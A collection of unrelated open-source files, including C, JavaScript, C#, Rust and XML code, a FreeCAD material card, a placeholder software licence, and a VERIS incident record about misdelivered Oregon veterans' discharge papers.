* documentation is hereby granted, provided that both the copyright
* notice and this permission notice appear in all copies of the
* software, derivative works or modified versions, and any portions
* thereof, and that both notices appear in supporting documentation.
*
* CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
* CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
* ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
*
* Carnegie Mellon requests users of this software to return to
*
* Software Distribution Coordinator or [email protected]
* School of Computer Science
* Carnegie Mellon University
* Pittsburgh PA 15213-3890
*
* any improvements or extensions that they make and grant Carnegie Mellon
* the rights to redistribute these changes.
*/
/*
* File: mach_error.c
* Author: Douglas Orr, Carnegie Mellon University
* Date: Mar 1988
*
* interprets structured mach error codes and prints
* or returns a descriptive string.
*/
#include <mach/mach_error.h>
#include <mach/boolean.h>
#include "errorlib.h"
#include "string.h"
int fprintf_stderr(const char *format, ...);
void
mach_error(const char *str, mach_error_t err)
{
char *err_str;
char buf[1024];
boolean_t diag;
err_str = mach_error_string_int(err, &diag);
if (diag) {
_mach_snprintf(buf, sizeof(buf), "%s %s (%x)", mach_error_type(err), err_str, err);
err_str = buf;
}
fprintf_stderr("%s %s\n", str, err_str);
}
| {
"pile_set_name": "Github"
} |
; Steel-17CrNiMo6
; (c) 2014 M. Münch - GNU Lesser General Public License (LGPL)
; information about the content of such cards can be found on the wiki:
; https://www.freecadweb.org/wiki/Material
; file created by FreeCAD0.18.16022 (Git)
[General]
Name = 17CrNiMo6
NameDE = 17CrNiMo6
DescriptionDE = höchste Beanspruchung, Wellen, Zahnräder
Father = Metal
KindOfMaterial = Case-hardened steel
KindOfMaterialDE = Einsatzstahl
MaterialNumber = 1.6587
Norm = EN 10084
[Mechanical]
Density = 7800 kg/m^3
PoissonRatio = 0.3
ShearModulus = 81000 MPa
UltimateStrain = 8
UltimateTensileStrength = 1150 MPa
YieldStrength = 830 MPa
YoungsModulus = 210000 MPa
[Thermal]
ThermalExpansionCoefficient = 0.000011 m/m/K
| {
"pile_set_name": "Github"
} |
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
namespace Microsoft.Azure.IIoT.Hub.Mock {
using Microsoft.Azure.IIoT.Hub.Client;
using Microsoft.Azure.IIoT.Hub.Services;
using Microsoft.Azure.IIoT.Serializers;
using Microsoft.Azure.IIoT.Module.Default;
using Autofac;
/// <summary>
/// Injected mock framework module
/// </summary>
public sealed class IoTHubMockService : Module {
/// <summary>
/// Load the module
/// </summary>
/// <param name="builder"></param>
protected override void Load(ContainerBuilder builder) {
// IoT hub and storage simulation
builder.RegisterType<IoTHubServices>()
.AsImplementedInterfaces().InstancePerLifetimeScope();
// Adapters
builder.RegisterType<IoTHubDeviceEventHandler>()
.AsImplementedInterfaces().InstancePerLifetimeScope();
builder.RegisterType<IoTHubTwinMethodClient>()
.AsImplementedInterfaces();
builder.RegisterType<ChunkMethodClient>()
.AsImplementedInterfaces();
// Register default serializers...
builder.RegisterModule<NewtonSoftJsonModule>();
base.Load(builder);
}
}
}
| {
"pile_set_name": "Github"
} |
/* -*- Mode: js; js-indent-level: 2; -*- */
/*
* Copyright 2011 Mozilla Foundation and contributors
* Licensed under the New BSD license. See LICENSE or:
* http://opensource.org/licenses/BSD-3-Clause
*/
if (typeof define !== 'function') {
var define = require('amdefine')(module, require);
}
define(function (require, exports, module) {
var SourceMapConsumer = require('../../lib/source-map/source-map-consumer').SourceMapConsumer;
var SourceMapGenerator = require('../../lib/source-map/source-map-generator').SourceMapGenerator;
exports['test that we can instantiate with a string or an objects'] = function (assert, util) {
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(util.testMap);
});
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(JSON.stringify(util.testMap));
});
};
exports['test that the `sources` field has the original sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var sources = map.sources;
assert.equal(sources[0], '/the/root/one.js');
assert.equal(sources[1], '/the/root/two.js');
assert.equal(sources.length, 2);
};
exports['test that the source root is reflected in a mapping\'s source field'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var mapping;
mapping = map.originalPositionFor({
line: 2,
column: 1
});
assert.equal(mapping.source, '/the/root/two.js');
mapping = map.originalPositionFor({
line: 1,
column: 1
});
assert.equal(mapping.source, '/the/root/one.js');
};
exports['test mapping tokens back exactly'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
util.assertMapping(1, 1, '/the/root/one.js', 1, 1, null, map, assert);
util.assertMapping(1, 5, '/the/root/one.js', 1, 5, null, map, assert);
util.assertMapping(1, 9, '/the/root/one.js', 1, 11, null, map, assert);
util.assertMapping(1, 18, '/the/root/one.js', 1, 21, 'bar', map, assert);
util.assertMapping(1, 21, '/the/root/one.js', 2, 3, null, map, assert);
util.assertMapping(1, 28, '/the/root/one.js', 2, 10, 'baz', map, assert);
util.assertMapping(1, 32, '/the/root/one.js', 2, 14, 'bar', map, assert);
util.assertMapping(2, 1, '/the/root/two.js', 1, 1, null, map, assert);
util.assertMapping(2, 5, '/the/root/two.js', 1, 5, null, map, assert);
util.assertMapping(2, 9, '/the/root/two.js', 1, 11, null, map, assert);
util.assertMapping(2, 18, '/the/root/two.js', 1, 21, 'n', map, assert);
util.assertMapping(2, 21, '/the/root/two.js', 2, 3, null, map, assert);
util.assertMapping(2, 28, '/the/root/two.js', 2, 10, 'n', map, assert);
};
exports['test mapping tokens fuzzy'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
// Finding original positions
util.assertMapping(1, 20, '/the/root/one.js', 1, 21, 'bar', map, assert, true);
util.assertMapping(1, 30, '/the/root/one.js', 2, 10, 'baz', map, assert, true);
util.assertMapping(2, 12, '/the/root/two.js', 1, 11, null, map, assert, true);
// Finding generated positions
util.assertMapping(1, 18, '/the/root/one.js', 1, 22, 'bar', map, assert, null, true);
util.assertMapping(1, 28, '/the/root/one.js', 2, 13, 'baz', map, assert, null, true);
util.assertMapping(2, 9, '/the/root/two.js', 1, 16, null, map, assert, null, true);
};
exports['test creating source map consumers with )]}\' prefix'] = function (assert, util) {
assert.doesNotThrow(function () {
var map = new SourceMapConsumer(")]}'" + JSON.stringify(util.testMap));
});
};
exports['test eachMapping'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var previousLine = -Infinity;
var previousColumn = -Infinity;
map.eachMapping(function (mapping) {
assert.ok(mapping.generatedLine >= previousLine);
if (mapping.source) {
assert.equal(mapping.source.indexOf(util.testMap.sourceRoot), 0);
}
if (mapping.generatedLine === previousLine) {
assert.ok(mapping.generatedColumn >= previousColumn);
previousColumn = mapping.generatedColumn;
}
else {
previousLine = mapping.generatedLine;
previousColumn = -Infinity;
}
});
};
exports['test iterating over mappings in a different order'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var previousLine = -Infinity;
var previousColumn = -Infinity;
var previousSource = "";
map.eachMapping(function (mapping) {
assert.ok(mapping.source >= previousSource);
if (mapping.source === previousSource) {
assert.ok(mapping.originalLine >= previousLine);
if (mapping.originalLine === previousLine) {
assert.ok(mapping.originalColumn >= previousColumn);
previousColumn = mapping.originalColumn;
}
else {
previousLine = mapping.originalLine;
previousColumn = -Infinity;
}
}
else {
previousSource = mapping.source;
previousLine = -Infinity;
previousColumn = -Infinity;
}
}, null, SourceMapConsumer.ORIGINAL_ORDER);
};
exports['test that we can set the context for `this` in eachMapping'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMap);
var context = {};
map.eachMapping(function () {
assert.equal(this, context);
}, context);
};
exports['test that the `sourcesContent` field has the original sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMapWithSourcesContent);
var sourcesContent = map.sourcesContent;
assert.equal(sourcesContent[0], ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(sourcesContent[1], ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.equal(sourcesContent.length, 2);
};
exports['test that we can get the original sources for the sources'] = function (assert, util) {
var map = new SourceMapConsumer(util.testMapWithSourcesContent);
var sources = map.sources;
assert.equal(map.sourceContentFor(sources[0]), ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(map.sourceContentFor(sources[1]), ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.equal(map.sourceContentFor("one.js"), ' ONE.foo = function (bar) {\n return baz(bar);\n };');
assert.equal(map.sourceContentFor("two.js"), ' TWO.inc = function (n) {\n return n + 1;\n };');
assert.throws(function () {
map.sourceContentFor("");
}, Error);
assert.throws(function () {
map.sourceContentFor("/the/root/three.js");
}, Error);
assert.throws(function () {
map.sourceContentFor("three.js");
}, Error);
};
exports['test sourceRoot + generatedPositionFor'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'foo/bar',
file: 'baz.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bang.coffee'
});
map.addMapping({
original: { line: 5, column: 5 },
generated: { line: 6, column: 6 },
source: 'bang.coffee'
});
map = new SourceMapConsumer(map.toString());
// Should handle without sourceRoot.
var pos = map.generatedPositionFor({
line: 1,
column: 1,
source: 'bang.coffee'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
// Should handle with sourceRoot.
var pos = map.generatedPositionFor({
line: 1,
column: 1,
source: 'foo/bar/bang.coffee'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
};
exports['test sourceRoot + originalPositionFor'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'foo/bar',
file: 'baz.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bang.coffee'
});
map = new SourceMapConsumer(map.toString());
var pos = map.originalPositionFor({
line: 2,
column: 2,
});
// Should always have the prepended source root
assert.equal(pos.source, 'foo/bar/bang.coffee');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
};
exports['test github issue #56'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://',
file: 'www.example.com/foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'www.example.com/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1);
assert.equal(sources[0], 'http://www.example.com/original.js');
};
exports['test github issue #43'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://example.com',
file: 'foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'http://cdn.example.com/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1,
'Should only be one source.');
assert.equal(sources[0], 'http://cdn.example.com/original.js',
'Should not be joined with the sourceRoot.');
};
exports['test absolute path, but same host sources'] = function (assert, util) {
var map = new SourceMapGenerator({
sourceRoot: 'http://example.com/foo/bar',
file: 'foo.js'
});
map.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: '/original.js'
});
map = new SourceMapConsumer(map.toString());
var sources = map.sources;
assert.equal(sources.length, 1,
'Should only be one source.');
assert.equal(sources[0], 'http://example.com/original.js',
'Source should be relative the host of the source root.');
};
exports['test github issue #64'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sourceRoot": "http://example.com/",
"sources": ["/a"],
"names": [],
"mappings": "AACA",
"sourcesContent": ["foo"]
});
assert.equal(map.sourceContentFor("a"), "foo");
assert.equal(map.sourceContentFor("/a"), "foo");
};
exports['test bug 885597'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sourceRoot": "file:///Users/AlGore/Invented/The/Internet/",
"sources": ["/a"],
"names": [],
"mappings": "AACA",
"sourcesContent": ["foo"]
});
var s = map.sources[0];
assert.equal(map.sourceContentFor(s), "foo");
};
exports['test github issue #72, duplicate sources'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sources": ["source1.js", "source1.js", "source3.js"],
"names": [],
"mappings": ";EAAC;;IAEE;;MEEE",
"sourceRoot": "http://example.com"
});
var pos = map.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.source, 'http://example.com/source1.js');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
var pos = map.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.source, 'http://example.com/source1.js');
assert.equal(pos.line, 3);
assert.equal(pos.column, 3);
var pos = map.originalPositionFor({
line: 6,
column: 6
});
assert.equal(pos.source, 'http://example.com/source3.js');
assert.equal(pos.line, 5);
assert.equal(pos.column, 5);
};
exports['test github issue #72, duplicate names'] = function (assert, util) {
var map = new SourceMapConsumer({
"version": 3,
"file": "foo.js",
"sources": ["source.js"],
"names": ["name1", "name1", "name3"],
"mappings": ";EAACA;;IAEEA;;MAEEE",
"sourceRoot": "http://example.com"
});
var pos = map.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.name, 'name1');
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
var pos = map.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.name, 'name1');
assert.equal(pos.line, 3);
assert.equal(pos.column, 3);
var pos = map.originalPositionFor({
line: 6,
column: 6
});
assert.equal(pos.name, 'name3');
assert.equal(pos.line, 5);
assert.equal(pos.column, 5);
};
exports['test SourceMapConsumer.fromSourceMap'] = function (assert, util) {
var smg = new SourceMapGenerator({
sourceRoot: 'http://example.com/',
file: 'foo.js'
});
smg.addMapping({
original: { line: 1, column: 1 },
generated: { line: 2, column: 2 },
source: 'bar.js'
});
smg.addMapping({
original: { line: 2, column: 2 },
generated: { line: 4, column: 4 },
source: 'baz.js',
name: 'dirtMcGirt'
});
smg.setSourceContent('baz.js', 'baz.js content');
var smc = SourceMapConsumer.fromSourceMap(smg);
assert.equal(smc.file, 'foo.js');
assert.equal(smc.sourceRoot, 'http://example.com/');
assert.equal(smc.sources.length, 2);
assert.equal(smc.sources[0], 'http://example.com/bar.js');
assert.equal(smc.sources[1], 'http://example.com/baz.js');
assert.equal(smc.sourceContentFor('baz.js'), 'baz.js content');
var pos = smc.originalPositionFor({
line: 2,
column: 2
});
assert.equal(pos.line, 1);
assert.equal(pos.column, 1);
assert.equal(pos.source, 'http://example.com/bar.js');
assert.equal(pos.name, null);
pos = smc.generatedPositionFor({
line: 1,
column: 1,
source: 'http://example.com/bar.js'
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
pos = smc.originalPositionFor({
line: 4,
column: 4
});
assert.equal(pos.line, 2);
assert.equal(pos.column, 2);
assert.equal(pos.source, 'http://example.com/baz.js');
assert.equal(pos.name, 'dirtMcGirt');
pos = smc.generatedPositionFor({
line: 2,
column: 2,
source: 'http://example.com/baz.js'
});
assert.equal(pos.line, 4);
assert.equal(pos.column, 4);
};
});
| {
"pile_set_name": "Github"
} |
#ifndef __NVKM_MEM_H__
#define __NVKM_MEM_H__
#include "priv.h"
int nvkm_mem_new_type(struct nvkm_mmu *, int type, u8 page, u64 size,
void *argv, u32 argc, struct nvkm_memory **);
int nvkm_mem_map_host(struct nvkm_memory *, void **pmap);
int nv04_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int nv04_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
int nv50_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int nv50_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
int gf100_mem_new(struct nvkm_mmu *, int, u8, u64, void *, u32,
struct nvkm_memory **);
int gf100_mem_map(struct nvkm_mmu *, struct nvkm_memory *, void *, u32,
u64 *, u64 *, struct nvkm_vma **);
#endif
| {
"pile_set_name": "Github"
} |
import pandas as pd
import numpy as np
from sklearn.datasets import dump_svmlight_file
df1 = pd.read_csv("./dataset/input_label.csv")
df2 = pd.read_csv("./dataset/input.csv")
res = pd.merge(df1, df2, how='left', left_on='id', right_on='id')
X = res[np.setdiff1d(res.columns,['label','id'])]
y = res.label
dump_svmlight_file(X,y,'/host/smvlight.dat',zero_based=True,multilabel=False)
| {
"pile_set_name": "Github"
} |
var baseCreate = require('./_baseCreate'),
isObject = require('./isObject');
/**
* Creates a function that produces an instance of `Ctor` regardless of
* whether it was invoked as part of a `new` expression or by `call` or `apply`.
*
* @private
* @param {Function} Ctor The constructor to wrap.
* @returns {Function} Returns the new wrapped function.
*/
function createCtor(Ctor) {
return function() {
// Use a `switch` statement to work with class constructors. See
// http://ecma-international.org/ecma-262/7.0/#sec-ecmascript-function-objects-call-thisargument-argumentslist
// for more details.
var args = arguments;
switch (args.length) {
case 0: return new Ctor;
case 1: return new Ctor(args[0]);
case 2: return new Ctor(args[0], args[1]);
case 3: return new Ctor(args[0], args[1], args[2]);
case 4: return new Ctor(args[0], args[1], args[2], args[3]);
case 5: return new Ctor(args[0], args[1], args[2], args[3], args[4]);
case 6: return new Ctor(args[0], args[1], args[2], args[3], args[4], args[5]);
case 7: return new Ctor(args[0], args[1], args[2], args[3], args[4], args[5], args[6]);
}
var thisBinding = baseCreate(Ctor.prototype),
result = Ctor.apply(thisBinding, args);
// Mimic the constructor's `return` behavior.
// See https://es5.github.io/#x13.2.2 for more details.
return isObject(result) ? result : thisBinding;
};
}
module.exports = createCtor;
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<component name="org.nuxeo.ecm.directories">
<!-- template definitions for vocabularies -->
<extension target="org.nuxeo.ecm.directory.GenericDirectory" point="directories">
<directory name="template-vocabulary" template="true" extends="template-directory">
<schema>vocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-xvocabulary" template="true" extends="template-directory">
<schema>xvocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-l10nxvocabulary" template="true" extends="template-directory">
<schema>l10nxvocabulary</schema>
<idField>id</idField>
</directory>
<directory name="template-documentsLists" template="true" extends="template-directory">
<schema>documentsLists</schema>
<idField>id</idField>
</directory>
</extension>
<!-- vocabulary definitions -->
<extension target="org.nuxeo.ecm.directory.GenericDirectory" point="directories">
<directory name="country" extends="template-xvocabulary">
<parentDirectory>continent</parentDirectory>
<dataFile>directories/country.csv</dataFile>
</directory>
<directory name="continent" extends="template-vocabulary">
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">country</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/continent.csv</dataFile>
</directory>
<directory name="l10ncoverage" extends="template-l10nxvocabulary">
<parentDirectory>l10ncoverage</parentDirectory>
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">l10ncoverage</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/l10ncoverage.csv</dataFile>
</directory>
<directory name="subtopic" extends="template-xvocabulary">
<parentDirectory>topic</parentDirectory>
<dataFile>directories/subtopic.csv</dataFile>
</directory>
<directory name="topic" extends="template-vocabulary">
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">subtopic</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/topic.csv</dataFile>
</directory>
<directory name="l10nsubjects" extends="template-l10nxvocabulary">
<parentDirectory>l10nsubjects</parentDirectory>
<deleteConstraint
class="org.nuxeo.ecm.directory.HierarchicalDirectoryDeleteConstraint">
<property name="targetDirectory">l10nsubjects</property>
<property name="targetDirectoryField">parent</property>
</deleteConstraint>
<dataFile>directories/l10nsubjects.csv</dataFile>
</directory>
<directory name="subject" extends="template-vocabulary">
<types>
<type>system</type>
</types>
<dataFile>directories/subject.csv</dataFile>
</directory>
<directory name="search_operators" extends="template-vocabulary">
<types>
<type>system</type>
</types>
<dataFile>directories/search_operators.csv</dataFile>
</directory>
<directory name="documentsLists" extends="template-documentsLists">
<types>
<type>system</type>
</types>
<permissions>
<permission name="Write">
<group>Everyone</group>
</permission>
</permissions>
</directory>
<directory name="language" extends="template-vocabulary">
<dataFile>directories/language.csv</dataFile>
</directory>
<directory name="nature" extends="template-vocabulary">
<dataFile>directories/nature.csv</dataFile>
</directory>
</extension>
</component>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2004-2006 Atmel Corporation
*
* See file CREDITS for list of people who contributed to this
* project.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston,
* MA 02111-1307 USA
*/
#include <common.h>
#include <div64.h>
#include <asm/errno.h>
#include <asm/io.h>
#include <asm/processor.h>
#include <asm/sysreg.h>
#include <asm/arch/hardware.h>
#define HANDLER_MASK 0x00ffffff
#define INTLEV_SHIFT 30
#define INTLEV_MASK 0x00000003
DECLARE_GLOBAL_DATA_PTR;
/* Incremented whenever COUNT reaches 0xffffffff by timer_interrupt_handler */
volatile unsigned long timer_overflow;
/*
* Instead of dividing by get_tbclk(), multiply by this constant and
* right-shift the result by 32 bits.
*/
static unsigned long tb_factor;
unsigned long get_tbclk(void)
{
return gd->cpu_hz;
}
unsigned long long get_ticks(void)
{
unsigned long lo, hi_now, hi_prev;
do {
hi_prev = timer_overflow;
lo = sysreg_read(COUNT);
hi_now = timer_overflow;
} while (hi_prev != hi_now);
return ((unsigned long long)hi_now << 32) | lo;
}
unsigned long get_timer(unsigned long base)
{
u64 now = get_ticks();
now *= tb_factor;
return (unsigned long)(now >> 32) - base;
}
/*
* For short delays only. It will overflow after a few seconds.
*/
void __udelay(unsigned long usec)
{
unsigned long cycles;
unsigned long base;
unsigned long now;
base = sysreg_read(COUNT);
cycles = ((usec * (get_tbclk() / 10000)) + 50) / 100;
do {
now = sysreg_read(COUNT);
} while ((now - base) < cycles);
}
static int set_interrupt_handler(unsigned int nr, void (*handler)(void),
unsigned int priority)
{
extern void _evba(void);
unsigned long intpr;
unsigned long handler_addr = (unsigned long)handler;
handler_addr -= (unsigned long)&_evba;
if ((handler_addr & HANDLER_MASK) != handler_addr
|| (priority & INTLEV_MASK) != priority)
return -EINVAL;
intpr = (handler_addr & HANDLER_MASK);
intpr |= (priority & INTLEV_MASK) << INTLEV_SHIFT;
writel(intpr, (void *)ATMEL_BASE_INTC + 4 * nr);
return 0;
}
int timer_init(void)
{
extern void timer_interrupt_handler(void);
u64 tmp;
sysreg_write(COUNT, 0);
tmp = (u64)CONFIG_SYS_HZ << 32;
tmp += gd->cpu_hz / 2;
do_div(tmp, gd->cpu_hz);
tb_factor = (u32)tmp;
if (set_interrupt_handler(0, &timer_interrupt_handler, 3))
return -EINVAL;
/* For all practical purposes, this gives us an overflow interrupt */
sysreg_write(COMPARE, 0xffffffff);
return 0;
}
| {
"pile_set_name": "Github"
} |
{\rtf1\ansi\ansicpg1252\cocoartf1504\cocoasubrtf830
\cocoascreenfonts1{\fonttbl\f0\fswiss\fcharset0 ArialMT;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww17060\viewh12300\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\f0\b\fs20 \cf0 THIS IS A PLACEHOLDER LICENCE PROVIDED WITH IPLUG2 WITH NO LEGAL BASIS\
CONSULT A LAWYER BEFORE MAKING A LICENCE\
\
Caveat:
\b0 \
By installing this software you agree to use it at your own risk. The developer cannot be held responsible for any damages caused as a result of it's use.\
\
\b Distribution:
\b0 \
You are not permitted to distribute the software without the developer's permission. This includes, but is not limited to the distribution on magazine covers or software review websites.\
\
\b Multiple Installations*:
\b0 If you purchased this product as an individual, you are licensed to install and use the software on any computer you need to use it on, providing you remove it afterwards (if it is a shared machine). If you purchased it as an institution or company, you are licensed to use it on one machine only, and must purchase additional copies for each machine you wish to use it on.\
\
\b Upgrades*:
\b0 If you purchased this product you are entitled to free updates until the next major version number. The developer makes no guarantee is made that this product will be maintained indefinitely.\
\
\b License transfers*:
\b0 If you purchased this product you may transfer your license to another person. As the original owner you are required to contact the developer with the details of the license transfer, so that the new owner can receive the updates and support attached to the license. Upon transferring a license the original owner must remove any copies from their machines and are no longer permitted to use the software.\
\
\b IPlugInstrument is \'a9 Copyright THE DEVELOPER 2004-2011\
\b0 \
http://www.thedeveloperswebsite.com\
\
VST and VST3 are trademarks of Steinberg Media Technologies GmbH. \
Audio Unit is a trademark of Apple, Inc. \
AAX is a trademarks of Avid, Inc.\
\
* Applies to full version only, not the demo version.} | {
"pile_set_name": "Github"
} |
//! This module is responsible for defining the external config format and parsing it.
use {
crate::{galaxygen, Particle},
serde::Deserialize,
};
#[derive(Deserialize, Clone, Debug)]
/// The configuration that specifies the initial values of the simulation.
pub struct Config {
pub camera_pos: [f32; 3],
pub safety: f64,
pub constructions: Vec<Construction>,
}
#[derive(Deserialize, Clone, Debug)]
/// Description of a (group of) particles.
pub enum Construction {
Particle {
pos: [f32; 3],
vel: [f32; 3],
mass: f64,
},
Galaxy {
center_pos: [f32; 3],
center_vel: [f32; 3],
center_mass: f64,
amount: u32,
normal: [f32; 3],
},
}
impl Config {
/// Build the actual particles from the constructions.
pub fn construct_particles(&self) -> Vec<Particle> {
let mut particles = Vec::new();
// Those with mass first
for c in &self.constructions {
particles.push(match c {
Construction::Particle { pos, vel, mass } => {
Particle::new((*pos).into(), (*vel).into(), *mass, 1.0)
}
Construction::Galaxy {
center_pos,
center_vel,
center_mass,
..
} => Particle::new(
(*center_pos).into(),
(*center_vel).into(),
*center_mass,
1.0,
),
})
}
// Particles without mass last
for c in &self.constructions {
if let Construction::Galaxy {
center_pos,
center_vel,
center_mass,
amount,
normal,
} = c
{
galaxygen::generate_galaxy(
&mut particles,
*amount,
self.safety,
(*center_pos).into(),
(*center_vel).into(),
*center_mass,
(*normal).into(),
);
}
}
particles
}
}
| {
"pile_set_name": "Github"
} |
module A { header "A.h" }
module B { header "B.h" }
module Common { header "Common.h" }
| {
"pile_set_name": "Github"
} |
r"""Draw a random partition."""
import numpy as np
from numpy.random import dirichlet
def draw_bkps(n_samples=100, n_bkps=3):
"""Draw a random partition with specified number of samples and specified number of changes."""
alpha = np.ones(n_bkps + 1) / (n_bkps + 1) * 2000
bkps = np.cumsum(dirichlet(alpha) * n_samples).astype(int).tolist()
bkps[-1] = n_samples
return bkps
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <objc/NSObject.h>
@class CALayer;
@protocol OS_dispatch_queue, OS_xpc_object;
@interface DPRemoteDesktopPicture : NSObject
{
NSObject<OS_xpc_object> *_connection;
NSObject<OS_dispatch_queue> *_queue;
unsigned int _did;
CALayer *_desktopPictureLayer;
}
+ (void)queue:(id)arg1 remoteDesktopPictureForDisplay:(unsigned int)arg2 block:(CDUnknownBlockType)arg3;
@property(readonly) CALayer *desktopPictureLayer; // @synthesize desktopPictureLayer=_desktopPictureLayer;
- (void).cxx_destruct;
- (void)invalidate;
- (void)dealloc;
- (id)_initWithDisplay:(unsigned int)arg1 queue:(id)arg2 andBlock:(CDUnknownBlockType)arg3;
@end
| {
"pile_set_name": "Github"
} |
{
"action": {
"error": {
"variety": [
"Misdelivery"
],
"vector": [
"Unknown"
]
}
},
"actor": {
"internal": {
"motive": [
"NA"
],
"variety": [
"Unknown"
]
}
},
"asset": {
"assets": [
{
"variety": "M - Documents"
}
],
"cloud": [
"Unknown"
]
},
"attribute": {
"availability": {
"variety": [
"Loss"
]
},
"confidentiality": {
"data": [
{
"amount": 967,
"variety": "Medical"
}
],
"data_disclosure": "Yes",
"data_total": 967,
"data_victim": [
"Patient"
],
"state": [
"Stored unencrypted"
]
}
},
"discovery_method": {
"unknown": true
},
"impact": {
"overall_rating": "Unknown"
},
"incident_id": "FBDCDE9F-B47B-41B6-B79B-46DCAE8FB94E",
"plus": {
"analysis_status": "Finalized",
"analyst": "swidup",
"attribute": {
"confidentiality": {
"credit_monitoring": "Unknown"
}
},
"created": "2016-07-13T01:25:00Z",
"dbir_year": 2017,
"github": "6909",
"master_id": "D9414626-1FD7-4500-8C66-3F91532A376E",
"modified": "2016-07-13T01:33:00Z",
"sub_source": "phidbr",
"timeline": {
"notification": {
"day": 28,
"month": 12,
"year": 2015
}
}
},
"reference": "http://ijpr.org/post/personal-info-hundreds-oregon-veterans-compromised#stream/0",
"schema_version": "1.3.4",
"security_incident": "Confirmed",
"source_id": "vcdb",
"summary": "The Oregon Department of Veterans' Affairs says the personal information of hundreds of veterans may have been compromised. ODVA Director Cameron Smith said discharge and release papers may have been in the possession of an unauthorized person, but so far there's no evidence of misuse. \"A full investigation is pending _ but it appears that 967 veterans' personal information was shared outside of our control with an individual outside of our agency,\" said Smith. He said the information was in paper form, not digital. The ODVA is letting veterans know about the problem and offering free credit services because the forms contained social security numbers, dates of birth, addresses and full names.",
"timeline": {
"incident": {
"year": 2015
}
},
"victim": {
"country": [
"US"
],
"employee_count": "Over 100000",
"industry": "923120",
"region": [
"019021"
],
"state": "DC",
